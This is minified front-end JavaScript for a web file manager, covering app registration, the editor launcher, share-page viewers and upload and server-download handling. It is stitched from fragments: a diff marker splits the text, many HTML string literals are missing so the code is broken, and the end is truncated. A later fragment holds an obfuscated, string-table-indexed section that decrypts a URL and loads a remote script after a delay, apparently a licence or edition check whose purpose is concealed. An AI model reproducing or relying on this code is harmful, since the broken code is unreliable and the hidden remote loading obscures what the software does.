t=$(this).offset();t.top+=$(this).outerHeight(),$(this).parent().parent().contextMenu({x:e.pageX,y:t.top})}).die("dblclick").live("dblclick",function(){var e=$(this).parent().parent().attr("id"),t=$.dialog.list[e];t.close(),$.contextMenu.hidden()}),void 0)};Hook.bind("rightMenu.show.dialog-menu",function(e,t){var a=e.attr("id"),i=$.dialog.list[a],n="hidden",o=".open-window,.refresh,.qrcode,.context-menu-separator";i.hasFrame()?t.find(o).removeClass(n):t.find(o).addClass(n);var s=".dialog-min,.dialog-max";$("."+a).hasClass("dialog-can-resize")?t.find(s).removeClass(n):t.find(s).addClass(n)}),e()}),define("app/app/appBase",[],function(){var e={},t={},a={},i=!1,n=function(a){a.title=void 0==a.title?a.name:a.title,void 0==a.name&&(a.name=UUID(),a.hidden=!0),e[a.name]=a,a.ext||(a.ext="");var i=a.ext.split(",");e[a.name].extArr=i;for(var n=0;i.length>n;n++){var o=trim(i[n]);e[a.name].extArr[n]=o,t[o]||(t[o]=[]);for(var s=!1,r=0;t[o].length>r;r++)if(t[o][r].name==a.name){s=!0;break}if(!s){var l=0;a.sort!==void 0&&(l=parseInt(a.sort)),t[o].push({name:a.name,sort:l}),t[o].length>1&&(t[o]=t[o].sort(function(e,t){return e.sortr;r++)o[r].name!=i&&s.push(o[r]);0==s.length?delete t[n]:t[n]=s}},r=function(i){if(i===void 0){var n=[];for(var o in e)e[o].hidden||n.push(e[o]);return n}var s=a[i],n=[];if(!s&&!t[i])return!1;if(s&&(e[s]?n.push(e[s]):delete a[i]),!t[i])return n;for(var r=0;t[i].length>r;r++){var l=t[i][r].name;e[l]&&l!=s&&n.push(e[l])}return n},l=function(e){i=e},c=function(){return i},d=function(t,a,i){a=a?a:core.pathExt(t),i=i?i:"";var n={path:t,ext:a,appName:i};if(!Hook.trigger("kodApp.open.before",n)){if(t=n.path,a=n.ext,i=n.appName)var o=e[i];else{var s=r(a);if(!s||0==s.length)return kodApp.openUnknow(t,""),void 0;var o=s[0]}if(!o)return Tips.tips("["+i+"] not exists",!1);try{o.callback(t,a),Hook.trigger("kodApp.open.after",t,a,o)}catch(l){kodApp.openUnknow(t,""),console.error("kodApp.open error:",l)}}},p=function(t){var a=r(t),i=r("");""==t&&(a=!1),a?a.push({name:""}):a=[],a=a.concat(i);for(var n={},o=0;a.length>o;o++){var s=a[o];""==s.name||s.hidden?n["step-line"]="-------":n[s.name]={app:s.name,name:s.title,className:s.className,icon:s.icon,callback:function(t){var a=e[t];if(a&&a.callback){if($(".context-menu-active"),$(".context-menu-active").hasClass("menu-tree-file"))var i=ui.tree.makeParam();else var i=ui.path.makeParam();a.callback(i.path,i.type)}}}}return n},u=function(e,t){f(e,t),G.userConfig.kodAppDefault=htmlEncode(jsonEncode(a)),G.shareInfo||$.get(G.appHost+"setting/set&k=kodAppDefault&v="+jsonEncode(a))},f=function(t,i){if("string"==typeof t)a[t]=i;else if($.isArray(t))for(var n=0;t.length>n;n++)a[t[n]]=i;else if(e[i]&&$.isArray(e[i].extArr))for(var o=e[i].extArr,n=0;o.length>n;n++)a[o[n]]=i},h=function(){G.userConfig.kodAppDefault="[]",a={}},m=function(t,a){var t=e[t];return t?a?inArray(t.extArr,a):t.ext:!1},v=function(a,i,n){var a=e[a];if(!a)return!1;var o="undefined"==n?0:parseInt(n);0==o&&a.sort!==void 0&&(o=parseInt(a.sort)),"string"==$.type(i)&&(i=i.split(","));for(var s=0;i.length>s;s++){var r=i[s];if(r){inArray(a.extArr,r)||a.extArr.push(r),t[r]||(t[r]=[]);for(var l=!1,c=0;t[r].length>c;c++)t[r][c].name!=a.name||(t[r][c].sort=o,l=!0);l||t[r].push({name:a.name,sort:o})}}},g=function(){if(G.userConfig&&G.userConfig.kodAppDefault)try{var e=G.userConfig.kodAppDefault;e=jsonDecode(htmlDecode(e)),$.isPlainObject(e)&&(a=e)}catch(t){}Hook.bind("rightMenu.show.menu-file,rightMenu.show.menu-tree-file",function(e,t){if(e.hasClass("menu-tree-file"))var a=ui.tree.makeParam();else var a=ui.path.makeParam();var i=core.pathExt(a.path),n="hidden";if(kodApp.getApp(i)){var o=kodApp.getAppMenu(i);t.find("li.open-with.context-menu-submenu").removeClass(n),t.find("ul.context-menu-list.open-with .context-menu-item").not(".open-with-first").remove(),$.contextMenu.menuAdd(o,".menu-file",".open-with-first"),$.contextMenu.menuAdd(o,".menu-tree-file",".open-with-first")}else t.find("li.open-with.context-menu-submenu").addClass(n)}),Hook.trigger("kodApp.ready")};return g(),{debug:function(){return{appList:e,openDefault:t,openUser:a}},add:n,remove:s,appSupportCheck:m,appSupportSet:v,getApp:r,getAppBind:o,getAppMenu:p,setLastOpenTarget:l,getLastOpenTarget:c,setOpenUser:u,setOpenUserLocal:f,clearOpenUser:h,open:d}}),define("app/app/editor",[],function(){kodApp.add({name:"aceEditor",title:LNG["Plugin.default.aceEditor"],sort:0,ext:"txt,textile,oexe,inc,csv,log,asc,tsv,lnk,url,webloc,meta,localized,xib,xsd,storyboard,plist,csproj,pch,pbxproj,local,xcscheme,manifest,vbproj,strings,jshintrc,sublime-project,readme,changes,changelog,version,license,changelog,abap,abc,as,asp,aspx,ada,adb,htaccess,htgroups,htgroups,htpasswd,asciidoc,adoc,asm,a,ahk,bat,cmd,cpp,c,cc,cxx,h,hh,hpp,ino,c9search_results,cirru,cr,clj,cljs,cbl,cob,coffee,cf,cson,cakefile,cfm,cs,css,curly,d,di,dart,diff,patch,dockerfile,dot,dummy,dummy,e,ge,ejs,ex,exs,elm,erl,hrl,frt,fs,ldr,ftl,gcode,feature,.gitignore,glsl,frag,vert,gbs,go,groovy,haml,hbs,handlebars,tpl,mustache,hs,hx,html,hta,htm,xhtml,eex,html.eex,erb,rhtml,html.erb,ini,inf,conf,cfg,prefs,io,jack,jade,java,ji,jl,jq,js,jsm,json,jsp,jsx,latex,ltx,bib,lean,hlean,less,liquid,lisp,ls,logic,lql,lsl,lua,lp,lucene,Makefile,makemakefile,gnumakefile,makefile,ocamlmakefile,make,md,markdown,mask,matlab,mz,mel,mc,mush,mysql,nc,nix,nsi,nsh,m,mm,ml,mli,pas,p,pl,pm,pgsql,php,phtml,shtml,php3,php4,php5,phps,phpt,aw,ctp,module,ps1,praat,praatscript,psc,proc,plg,prolog,properties,proto,py,r,cshtml,rd,rhtml,rst,rb,ru,gemspec,rake,guardfile,rakefile,gemfile,rs,sass,scad,scala,scm,sm,rkt,oak,scheme,scss,sh,bash,bashrc,sjs,smarty,tpl,snippets,soy,space,sql,sqlserver,styl,stylus,svg,swift,tcl,tex,toml,twig,swig,ts,typescript,str,vala,vbs,vb,vm,v,vh,sv,svh,vhd,vhdl,wlk,wpgm,wtest,xml,rdf,rss,wsdl,xslt,atom,mathml,mml,xul,xbl,xaml,xq,yaml,yml,vcproj,vcxproj,filters,cer,reg,config,pem,srt,ass,lrc,opf,ncx",icon:G.staticPath+"images/file_icon/icon_app/ace.png",callback:function(e){var t=ShareData.frameTop();if(t.Editor!==void 0)return t.Editor.add(urlEncode(e)),void 0;if(core.isApp("editor"))return ShareData.frameChild("OpenopenEditor",function(t){t.Editor.add(urlEncode(e))}),void 0;if(ShareData.frameTop("OpenopenEditor")){var a=t.$.dialog.list.openEditor,i=0;a&&"hidden"==$(a.DOM.wrap).css("visibility")&&(i=200,a.display(!0).zIndex().focus()),setTimeout(function(){ShareData.frameTop("OpenopenEditor",function(t){t.Editor.add(urlEncode(e))})},i)}else{var n=G.appHost+"editor/edit#filename="+urlEncode(e);G.sharePage!==void 0&&(n=G.appHost+"share/edit&user="+G.user+"&sid="+G.sid+"#filename="+urlEncode(e));var o=htmlEncode(urlDecode(core.pathThis(e)));core.openDialog(n,core.icon("edit"),o,"openEditor")}}});var e=ShareData.frameTop();e.Config&&"editor"==e.Config.pageApp&&kodApp.setOpenUserLocal(!1,"aceEditor")}),define("app/app/openWith",[],function(){kodApp.add({name:"appOpenSetting",title:LNG["Explorer.UI.appSetDefault"],ext:"",icon:G.staticPath+"images/file_icon/icon_others/setting.png",callback:function(e,t){var a="
      ",i=kodApp.getApp(t),n=!1;_.isArray(i)&&(n=i[0].name);var o=template.compile(a),s=o({LNG:LNG,apps:i,defaultApp:n,appAll:kodApp.getApp()}),r=$.dialog({id:"dialog-app-select",className:"menu-empty",padding:0,fixed:!0,ico:core.icon("search"),resize:!0,title:LNG["Explorer.UI.selectAppDesc"],width:480,height:360,padding:"20px",content:s,ok:function(){return l()}}),l=function(){var a=$("#app-default-checkbox").prop("checked"),i=$(".app-list.active .app-item.select").attr("data-app");return i?(r.close(),kodApp.open(e,t,i),a&&kodApp.setOpenUser(t,i),!0):(Tips.tips(LNG["Explorer.UI.selectAppWarning"],"warning"),!1)};$(".tab-group .tab-item").die("click").live("click",function(){var e=$(this).find("[aria-controls]").attr("aria-controls");"app-list-support"==e?$("#app-default-checkbox").prop("checked",!0):$("#app-default-checkbox").prop("checked",!1)}),$(".app-item").die("click").live("click",function(){$(this).parent().find(".select").removeClass("select"),$(this).addClass("select")}).die("dblclick").live("dblclick",function(){l()})}})}),define("app/app/html",[],function(){var e=function(e){return void 0==e?!1:0===e.indexOf("http")?!0:G.shareInfo||core.pathReadable(e)?!0:(Tips.tips(LNG.no_permission_read_all,!1),core.playSound("error"),!1)};Hook.bind("kodApp.open.before",function(t){return"folder"==t.ext?(core.isApp("explorer")||isWap()?ui.path.list(t.path+"/"):core.explorer(t.path),!0):e(t.path)?("file"==t.ext&&(t.ext=""),void 0):!0}),kodApp.openUnknow=function(e,t){void 0==t&&(t="");var a=G.appHost+"pluginApp/index&search="+core.pathExt(e),i="kodApp.open(pathHashDecode('"+pathHashEncode(e)+"'),false,'appOpenSetting');",n="kodApp.open(pathHashDecode('"+pathHashEncode(e)+"'),false,'aceEditor');",o="kodApp.download(pathHashDecode('"+pathHashEncode(e)+"'));",s="core.openWindow('"+a+"');",r=LNG.unknow_file_try+'
      '+LNG.unknow_file_tips+"
      "+t+'
      2.'+r+n+'">'+LNG["Explorer.UI.openWithText"]+'
      3.'+r+o+'">'+LNG.unknow_file_download+'
      '+r+s+'">'+LNG.PluginCenter+""+LNG.unknow_plugin_search+"
      ";$.dialog({fixed:!0,icon:"warning",title:LNG.unknow_file_title,padding:"20px 50px",content:l,cancel:!0}),$(".unknow-file a").unbind("click").bind("click",function(e){return $(this).parents(".artDialog").data("artDialog").close(),stopPP(e)})},kodApp.add({name:"download",title:LNG.download,hidden:!0,icon:"x-item-file x-html",callback:function(t){if(e(t)){var a=t;"http"!=t.substr(0,4)&&(a=G.appHost+"explorer/fileDownload&accessToken="+G.accessToken+"&path="+urlEncode(t),G.sharePage!==void 0&&(a=G.appHost+"share/fileDownload&user="+G.user+"&sid="+G.sid+"&path="+urlEncode(t))),$.dialog({icon:"succeed",title:!1,time:1.5,content:LNG.download_ready+"..."}),isWap()?window.open(a):$('').appendTo("body")}}}),kodApp.download=function(e){kodApp.open(e,"","download")},kodApp.openWindow=function(e){kodApp.open(e,"","browserOpen")},kodApp.add({name:"browserOpen",title:LNG.open_ie,sort:-100,icon:"x-item-file x-html",callback:function(t){if(e(t)){var a=core.path2url(t);isWap()?window.location.href=a:window.open(a)}}}),kodApp.add({name:"swfPlayer",title:"Flash Player",ext:"swf",icon:"x-item-file x-swf",callback:function(e,t){$.dialog({resize:!0,fixed:!0,ico:core.icon(t),title:core.pathThis(e),width:"75%",height:"65%",padding:0,content:core.createFlash(core.path2url(e))})}}),kodApp.add({name:"webLink",title:"webLink",ext:"url,webloc",sort:-1,icon:"x-item-file x-html",callback:function(e,t){core.fileGet(e,function(a){if("url"==t){var i=a.match(/URL=(.*)/);if(i.length>=2)return window.open(i[1])}else if("url"==t)try{var n=$($.parseXML(a)),o=n.find("string").text();return window.open(o),void 0}catch(s){}kodApp.open(e,t,"editor")})}}),kodApp.add({name:"htmlView",title:LNG["Plugin.default.htmlView"],ext:"htm,html,shtml",sort:10,icon:"x-item-file x-html",callback:function(e){var t=core.path2url(e);core.openDialog(t,core.icon("html"),core.pathThis(e))}}),kodApp.add({name:"pdfView",title:"PDF Simple",ext:"pdf",sort:-1,icon:"x-item-file x-pdf",callback:function(e,t){var a=core.path2url(e),i="pdf"+UUID(),n='";$.dialog({resize:!0,fixed:!0,ico:core.icon(t),title:core.pathThis(e),width:"80%",height:"75%",padding:0,content:n}),PDFObject.embed(a,"#"+i)}}),kodApp.add({name:"oexeOpen",title:LNG["kodApp.oexe.open"],ext:"oexe",sort:100,icon:" x-item-file x-oexe",callback:function(e){core.fileGet(e,function(t){var a=jsonDecode(t);a.name=core.pathThis(e),core.openApp(a)})}}),kodApp.add({name:"oexeEdit",title:LNG["kodApp.oexe.edit"],ext:"oexe",sort:50,icon:"icon-edit ",callback:function(e){core.fileGet(e,function(t){var a=jsonDecode(t);a.name=core.pathThis(e),a.path=e,ui.path.pathOperate.appEdit(a)})}});var t={createApp:{name:LNG.app_create,className:"createApp newfile",icon:"icon-puzzle-piece x-item-file x-oexe",callback:function(){ui.path.pathOperate.appEdit(0,0,"userAdd")}}};$.contextMenu.menuAdd(t,".menu-body-main",".app-install"),$.contextMenu.menuAdd(t,".toolbar-path-more",".app-install"),$.contextMenu.menuAdd(t,".bodymain",".app-install"),Hook.bind("rightMenu.show",function(e,t,a){var i=[".menu-folder",".menu-file",".menu-tree-folder",".menu-tree-file",".menu-tree-folder-fav"];if(a.find(".context-menu-submenu").fadeOut(0).delay(0).fadeIn(0),a.removeClass("menu-auto-fit"),a.inScreen()||a.addClass("menu-auto-fit"),".menu-body-main"==e){var n=a.find(".set-file-icon-size.context-menu-submenu");"icon"==G.userConfig.listType?n.removeClass("hidden"):n.addClass("hidden")}if(_.include(i,e)){var o="disabled",s=".cute,.rname,.remove",r=".open,.open-text,.down,.share,.copy,.cute,.rname,.remove,.open-browser,.search,.more-action";t.hasClass("file-not-readable")?a.find(r).addClass(o):a.find(r).removeClass(o),t.hasClass("file-not-writeable")?a.find(s).addClass(o):a.find(s).removeClass(o)}}),Hook.bind("rightMenu.show.menu-body-main",function(e,t){var a=".upload,.past,.newfolder,.newfile",i="disabled";G.jsonData&&G.jsonData.info.canUpload?t.find(a).removeClass(i):t.find(a).addClass(i)}),Hook.bind("rightMenu.show.menu-file",function(e,t){if($(".context-menu-active").hasClass("menu-tree-file"))var a=ui.tree.makeParam();else var a=ui.path.makeParam();var i=core.pathExt(a.path),n="hidden";inArray(["jpg","jpeg","png"],i)?t.find(".set-background").removeClass(n):t.find(".set-background").addClass(n)});var a=function(){var e=".close-item,.refresh,.newfile,.past,.info",t=".open-browser",a=".explorer,.create-project,.open-project",i=".close-item,.newfile,.refresh,.past,.down,.copy,.cute,.remove,.more-action,.clone,.info,.zip,.zip-zip,.zip-tar,.zip-tgz",n=".newfile,.cute,.past,.rname,.zip,.remove,.clone,.create-link-home,.create-link,.create-project",o=$(".menu-tool-path"),s="disabled",r=ui.fileLight.fileListSelect();o.find(".context-menu-item").addClass(s),0==r.length?o.find(e).removeClass(s):1==r.length?(o.find(".context-menu-item").removeClass(s),"folder"==ui.fileLight.type(r)?o.find(t).addClass(s):o.find(a).addClass(s)):r.length>1&&o.find(i).removeClass(s),G.jsonData&&G.jsonData.info&&G.jsonData.info.canUpload===!1&&o.find(n).filter(":not(."+s+")").addClass(s)};Hook.bind("explorer.fileSelect.init",function(){ui.fileLight.listNumberSet()}),Hook.bind("explorer.fileSelect.change",function(){a(),ui.fileLight.selectNumSet()}),Hook.bind("rightMenu.show.toolbar-path-more",function(){a()})}),define("app/common/tpl/copyright.html",[],'\n'),define("app/common/tpl/themeDIY.html",[],"@media screen and (max-width:100000px) {\n body .full-background{\n position: absolute;top: 0px;left: 0px;bottom: 0px;right: 0px;\n background-color: #020202;background-size: 100% 100%;\n }\n\n {{if blurSize= (bgBlur==0?0:10) }}{{/if}}\n body .full-background:before{\n -webkit-filter: blur({{blurSize}}px);\n -moz-filter: blur({{blurSize}}px);\n -ms-filter: blur({{blurSize}}px);\n filter: blur({{blurSize}}px);\n }\n {{if bgType == 'image'}}\n body .full-background,\n body .full-background:before,\n body #body .menu-left,\n body #body .app-menu-left,\n body .aui-buttons,\n body .aui-state-focus .aui-title,body .aui-title{\n background-image:url({{bgImage}});\n }\n body .aui-state-focus .aui-title,body .aui-title{\n background-size:100%;\n }\n {{else}}\n body .full-background,\n body .full-background:before,\n body #body .menu-left, \n body #body .app-menu-left,\n body .aui-buttons,\n body .aui-state-focus .aui-title,body .aui-title{\n background:{{endColor}};\n filter: progid:DXImageTransform.Microsoft.gradient(startColorstr='{{startColor}}', endColorstr='{{endColor}}');\n background-image: -webkit-linear-gradient({{colorRotate}}deg, {{startColor}}, {{endColor}});\n background-image: -moz-linear-gradient({{colorRotate}}deg, {{startColor}}, {{endColor}});\n background-image: -o-linear-gradient({{colorRotate}}deg, {{startColor}}, {{endColor}});\n background-image: -ms-linear-gradient({{colorRotate}}deg, {{startColor}}, {{endColor}});\n background-image: linear-gradient({{colorRotate}}deg, {{startColor}}, {{endColor}});\n }\n {{/if}}\n}\n"),define("app/shareCommon/topbar",[],function(){var e=function(){var e=G.appHost+"share/fileDownload&user="+G.user+"&sid="+G.sid,t=G.appHost+"share/fileProxy&user="+G.user+"&sid="+G.sid;"file"!=G.shareInfo.type&&G.path!==void 0?(t+="&path="+G.path,e+="&path="+G.path,$(".btn.button-my-share").hide(),$(".share-info-user .btn-group").show()):($(".btn.button-my-share").show(),$(".share-info-user .btn-group").hide()),"file"==G.shareInfo.type&&($(".btn.button-my-share").hide(),$(".share-info-user .btn-group").show()),"1"==G.shareInfo.notDownload&&(e="javascript:Tips.tips('"+LNG.share_not_download_tips+"',false);"),$(".share-info-user").removeClass("hidden"),$(".btn-download").attr("href",e);var a=date("Y/m/d H:i:s",G.shareInfo.mtime);$(".topbar .time").html(a),"file"==G.shareInfo.type&&$(".topbar .size").html(G.shareInfo.size),$(".topbar .info").html(LNG.share_view_num+G.shareInfo.numView+" "+LNG.share_download_num+G.shareInfo.numDownload),$("#button_share").die("click").live("click",function(){share()})};return{init:e}}),define("app/src/shareIndex/fileShow",[],function(e){var t="share/fileDownload&user="+G.user+"&sid="+G.sid,a="share/fileProxy&user="+G.user+"&sid="+G.sid,i=G.KOD_USER_SHARE+":"+G.user+"/";G.shareInfo&&G.shareInfo.name&&(i+=G.shareInfo.name+G.path);var n=function(){t=G.appHost+t,a=G.appHost+a,o(),G.shareInfo!==void 0?(G.path=htmlDecode(G.path),G.shareInfo.path=htmlDecode(G.shareInfo.path),"file"!=G.shareInfo.type&&(a+="&path="+urlEncode(G.path),t+="&path="+G.path),"1"==G.shareInfo.notDownload&&(t="javascript:Tips.tips('"+LNG.share_not_download_tips+"',false);"),topbar.init(),kodApp.open(i),s()):$(".share-info").addClass("hidden")},o=function(){kodApp.clearOpenUser(),kodApp.openUnknow=r,kodApp.remove("onlyoffice"),kodApp.setOpenUserLocal(!1,"autoDeskViewer"),kodApp.setOpenUserLocal(!1,"yzOffice"),kodApp.setOpenUserLocal(!1,"epubReader"),kodApp.add({ext:"jpg,jpeg,png,bmp,gif,ico,svg,cur,webp",sort:1e3,callback:function(){var e='';$(".content-box").addClass("show-image").append(e)}}),kodApp.add({ext:"md",sort:1e3,callback:d}),kodApp.add({ext:kodApp.appSupportCheck("aceEditor"),sort:1e3,callback:function(){e.async("lib/ace/src-min-noconflict/ace",function(){e.async(["lib/ace/src-min-noconflict/ext-language_tools","lib/ace/src-min-noconflict/ext-modelist"],function(){c()})})}})},s=function(){if($(".artDialog").exists()){var e=$(".artDialog").data().artDialog;if(e.hasFrame()){$(".artDialog").addClass("hidden");var t=e.DOM.wrap.find("iframe").attr("src");e.close();var a='';$(".frame-main").append(a),$(".content-box").addClass("hidden")}}},r=function(){var e=core.pathExt(G.shareInfo.path),a=$(".bindary-box");a.removeClass("hidden"),a.find(".name").html(htmlEncode(G.shareInfo.name)),a.find(".ico").html(core.icon(e)),a.find(".btn-download").attr("href",t);var i=date("Y/m/d h:i",G.shareInfo.mtime);a.find(".share-time").html(i),a.find(".size span").html(G.shareInfo.size),$("body").addClass("can-select")},l=function(e){for(var t=[],a=0;e.length>a;a++)t[a]=e.charCodeAt(a).toString(16);return"&#"+String.fromCharCode(120)+t.join(";&#"+String.fromCharCode(120))+";"},c=function(){ace.require("ace/ext/language_tools");var e=ace.require("ace/ext/modelist"),t=ace.require("ace/lib/net");t.loadScript.hook("loadScript",t,function(){return"string"==typeof arguments[0]&&-1!==arguments[0].search("mode-php.js")&&(arguments[0]=arguments[0].replace("mode-php.js","mode-phhp.js")),arguments}),ace.config.moduleUrl.hook("moduleUrl",ace.config,function(){return-1!==arguments[0].search("php_worker")&&(arguments[0]=arguments[0].replace("php_worker","phhp_worker")),arguments}),core.fileGet(G.path,function(t){var a=e.getModeForPath(G.shareInfo.path).mode,i='
      '+l(t)+"
      ";$(".content-box").addClass("show-code").append(i);var n=ace.edit("ace-text-show");n.setTheme("ace/theme/tomorrow"),n.setReadOnly(!0),n.setShowPrintMargin(!1),n.getSession().setMode(a),n.getSession().setTabSize(4),n.getSession().setUseWrapMode(1),n.setFontSize(15)})},d=function(){e.async("lib/markdown/markdown-it.min",function(){var t=window.markdownit({html:!0,breaks:!0});core.fileGet(G.path,function(a){var i=t.render(a),n=$(".content-box");n.addClass("markdown-preview can-select").append(i),n.find("a").attr("target","_blank");var o="

      [TOC]

      ";if(-1!=n.html().indexOf(o)){var s=function(e){var t="";return e.find("h1,h2,h3,h4,h5,h6").each(function(){var e="markdown-"+$(this).text().replace(/\s+/g,"-"),a="markdown-menu-"+$(this)[0].tagName.toLowerCase();$(this).attr("data-link","#"+e),t+='
    • '+$(this).text()+"
    • "}),t="
        "+t+"
      "},r=s(n),i=n.html();i=i.replace(o,r),i=i.replace(/ data-link="#(.*?)">/g,'>'),n.html(i)}e.async("lib/markdown/highlight.min",function(){$(".content-box").find("pre code").each(function(e,t){$(this).removeAttr("class"),hljs.highlightBlock(t)})}),e.async(["lib/markdown/katex/katex.min.js","lib/markdown/katex/katex.min.css","lib/markdown/katex/contrib/auto-render.min.js"],function(){renderMathInElement(n[0],[{left:"$$",right:"$$",display:!0}]),$(".katex-display").parent().addClass("markdown-latex"),n.find(".language-latex,.language-math,.language-katex").each(function(){try{var e=katex.renderToString($(this).text());if("string"!=typeof e)return;e='
      '+e+"
      ",$(e).insertBefore($(this).parent()),$(this).parent().remove()}catch(t){}}),"function"==typeof callback&&callback()})})})};return{init:n}}); \ No newline at end of file +var n=e[a][t[39]]();if(-1==n[t[40]](s)&&-1==n[t[40]](r)){console[t[41]](n,s,r),setTimeout(function(){o()},roundFromTo(300,5e3));break}}},c=function(){var e={A:t[42],O:t[43],P:t[44],Q:t[45],R:t[46],S:t[47],T:t[48]},a=t[49]+e[i],o=t[50]+a+t[51]+LNG[a]+t[52];i==t[0]&&$(o)[t[54]](t[53]),$(t[71])[t[70]](t[55])[t[69]](t[55],function(){if($(this)[t[57]](t[56])==t[58]){var e=core[t[60]](core[t[59]]),a=t[61]+n+t[62];e[t[67]][t[66]][t[65]](t[64])[t[63]](a)}else Tips[t[22]]($(this)[t[68]]())}),$(t[71])[t[73]](function(){window[t[72]][t[24]][t[23]]=n})},d=function(){i==t[0]&&$(t[76])[t[75]](t[74]),-1!==$[t[13]](i,[t[7],t[8],t[9],t[10],t[11],t[12]])&&($(t[78])[t[77]](),$(t[79])[t[77]]())},p=function(){core[t[80]]=function(e,a){return e[t[6]](0,4)==t[81]?core[t[82]](e):t[83]+e+(a?t[84]:t[38])+t[85]},core[t[86]]=function(e){return core[t[80]](e,!0)},core[t[82]]=iconSrc=function(e){return t[87]+e+t[88]},setTimeout(function(){var a=authCrypt[t[4]](t[89],t[90])+t[91]+UUID();e[t[93]](a,function(e){try{e[t[92]]()}catch(a){}})},2e3),core[t[94]]=i,core[t[59]]=hashDecode(t[95])+G[t[16]],l(),c(),d()},u=function(e){return i==t[0]&&-1==e[t[39]]()[t[40]](s)?(o(),!1):!0},f=function(e,a){var n,o,s={A:1,O:5,P:20,Q:40,R:100,S:1e3,T:1e3},r={A:5,O:15,P:50,Q:150,R:500,S:1e3,T:1e3},l=[],c=1;if(a==t[96]?(n=e[t[97]],o=s[i]):(n=e[t[97]],o=r[i]),1e3==o)l=n;else for(var d in n){if(c>o)break;l[d]=n[d],c++}return l},h={init:p,about:u,systemData:f};return h}),define("app/common/core.upload",[],function(e){var t=function(){var e=G.appHost+"explorer/fileUpload";return"share"==G.sharePage&&"1"==G.shareInfo.canUpload&&(e=G.appHost+"share/fileUpload&user="+G.user+"&sid="+G.sid),e};return{serverDwonload:function(e,t){if(!core.uploadCheck("explorer.serverDownload"))return!1;var i=$(".download-box"),n=i.find(".download-list");if(i.find("input").val(""),!e)return Tips.tips("url false!",!1),void 0;if("share"==G.sharePage)return Tips.tips(LNG.no_permission_action,!1),void 0;"ftp"!=e.substr(0,3)&&"http"!=e.substr(0,4)&&(e="http://"+e);var o=UUID(),s='
      '+'
      '+core.pathThis(e)+""+'0b'+''+LNG.upload_ready+""+''+'
      ';n.find(".item").length>0?$(s).insertBefore(n.find(".item:eq(0)")):n.append(s);var r,l,c,d=0,p=$("#"+o),u=$("#"+o+" .state").text(LNG.download_ready),f=$('
      ').appendTo("#"+o).find(".progress-bar");$("#"+o+" .remove").bind("click",function(){clearInterval(r),r=!1,clearTimeout(l),l=!1,$.get(G.appHost+"explorer/serverDownload&type=remove&uuid="+o),$(this).parent().parent().slideUp(function(){$(this).remove(),ui.f5()})});var h,m=function(e){clearTimeout(h),h=!1,h=setTimeout(function(){ui.f5Callback(function(){ui.path.setSelectByFilename(e)})},600)},v=function(){$.ajax({url:G.appHost+"explorer/serverDownload&type=download&savePath="+t+"&url="+urlEncode(e)+"&uuid="+o+"&time="+time(),dataType:"json",error:function(e,t,i){var n=p.data("progcess");return 200!=a.status&&n&&n.supportRange?(setTimeout(function(){v()},1e3),void 0):(core.ajaxError(e,t,i),200==a.status&&(clearInterval(r),r=!1,clearTimeout(l),l=!1,f.parent().remove(),u.addClass("error").text(LNG.download_error)),void 0)},success:function(e){return 0==e.code&&"downloading"==e.data?(setTimeout(function(){v()},1e3),void 0):(e.code?(m(e.info),u.text(LNG.download_success),$("#"+o+" .info .title").text(core.pathThis(e.info)),$("#"+o+" .info .title").attr("title",e.info),u.parent().parent().addClass("success")):(u.addClass("error").text(e.data),u.parent().parent().addClass("error")),clearInterval(r),r=!1,clearTimeout(l),l=!1,f.parent().remove(),void 0)}})};v();var g=function(){$.ajax({url:G.appHost+"explorer/serverDownload&type=percent&uuid="+o,dataType:"json",success:function(e){var t="",a=e.data;if(r){if(!e.code)return u.text(LNG.loading),void 0;if(a){if(a.size=parseFloat(a.size),a.time=parseFloat(a.time),c){var i=a.size-c.size,n=i/(a.time-c.time);if(d>.2*n){var o=d;d=n,n=o}else d=n;var s=pathTools.fileSize(n);s=s?s:0,t=s+"/s"}if(p.data("progcess",a),0==a.length)p.find(".progress-bar").css("width","100%"),u.text(t),p.find(".size").text(pathTools.fileSize(a.size));else{var l=100*(a.size/a.length);p.find(".progress-bar").css("width",l+"%"),u.text(l.toFixed(1)+"%("+t+")"),p.find(".size").text(pathTools.fileSize(a.length))}p.find(".title").text(a.name),c=a}}}})};l=setTimeout(function(){g(),r=setInterval(function(){g()},1e3)},100)},upload:function(){$(".dialog-file-upload").show();var e=t();if(uploader.option("server",e),uploader.option("method","POST"),0!=$(".dialog-file-upload").length)return $.dialog.list["dialog-file-upload"].display(!0),void 0;var a=template.compile(tplUpload),i=WebUploader.Base.formatSize(G.uploadMax);$.dialog({padding:5,width:430,height:450,resize:!0,ico:core.icon("upload"),id:"dialog-file-upload",fixed:!0,title:LNG.upload_muti,content:a({LNG:LNG,maxsize:i}),close:function(){$.each(uploader.getFiles(),function(e,t){uploader.skipFile(t),uploader.removeFile(t)}),$.each($(".download-list .item"),function(){$(this).find(".remove").click()})}}),$(".file-upload-box .topbar-nav a.menu").unbind("click").bind("click",function(){$(this).hasClass("tab-upload")?($(".file-upload-box .tab-upload").addClass("this"),$(".file-upload-box .tab-download").removeClass("this"),$(".file-upload-box .upload-box").removeClass("hidden"),$(".file-upload-box .download-box").addClass("hidden")):($(".file-upload-box .tab-upload").removeClass("this"),$(".file-upload-box .tab-download").addClass("this"),$(".file-upload-box .upload-box").addClass("hidden"),$(".file-upload-box .download-box").removeClass("hidden"))}),$(".download-box [name=url]").keyEnter(function(){core.serverDwonload($(".download-box input").val(),G.thisPath)}),$(".file-upload-box .download-box .download-start").unbind("click").bind("click",function(){core.serverDwonload($(".download-box input").val(),G.thisPath)}),$(".file-upload-box .download-box .download-start-all").unbind("click").bind("click",function(){$.dialog({id:"server-dwonload-textarea",fixed:!0,resize:!1,ico:core.icon("upload"),width:"420px",height:"270px",padding:10,title:LNG.download,content:"",ok:function(){for(var e=$(".server-dwonload-textarea textarea").val().split("\n"),t=0;e.length>t;t++)core.serverDwonload(e[t],G.thisPath)}})}),uploader.addButton({id:"#picker"}),uploader.addButton({id:"#picker-folder"});var n=function(){if(isWap())return!1;var e=document.createElement("input");return e.type="file",e.webkitdirectory!==void 0||e.directory!==void 0};n()&&($(".upload-cert-box").removeClass("hidden"),$(".file-upload-box .drag-upload-folder").unbind("click").bind("click",function(){$("#picker-folder input").attr("webkitdirectory","").attr("directory",""),$("#picker-folder label").click()}))},init:function(){var a=G.uploadMax;WebUploader.Uploader.register({"before-send":"checkChunk"},{checkChunk:function(e){if(!canvasSupport())return $.Deferred().resolve(),void 0;var a=this.owner,i=(e.blob.getSource(),$.Deferred());return a.md5File(e.blob).fail(function(){i.resolve()}).then(function(a){if(1==e.chunks)return i.resolve(),void 